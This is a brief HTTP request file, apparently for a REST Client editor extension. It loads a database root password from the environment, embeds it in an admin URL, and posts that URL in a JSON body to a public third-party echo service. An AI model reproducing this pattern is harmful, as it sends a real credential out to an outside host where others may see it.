@p={{$dotenv DB_ROOT_PASSWORD}}
@baseUrl = http://admin:{{p}}@localhost:3007

###
https://echo.free.beeceptor.com
Content-Type: application/json

{
  "baseUrl": "{{baseUrl}}",
  "time": "{{$datetime rfc1123}}"
}
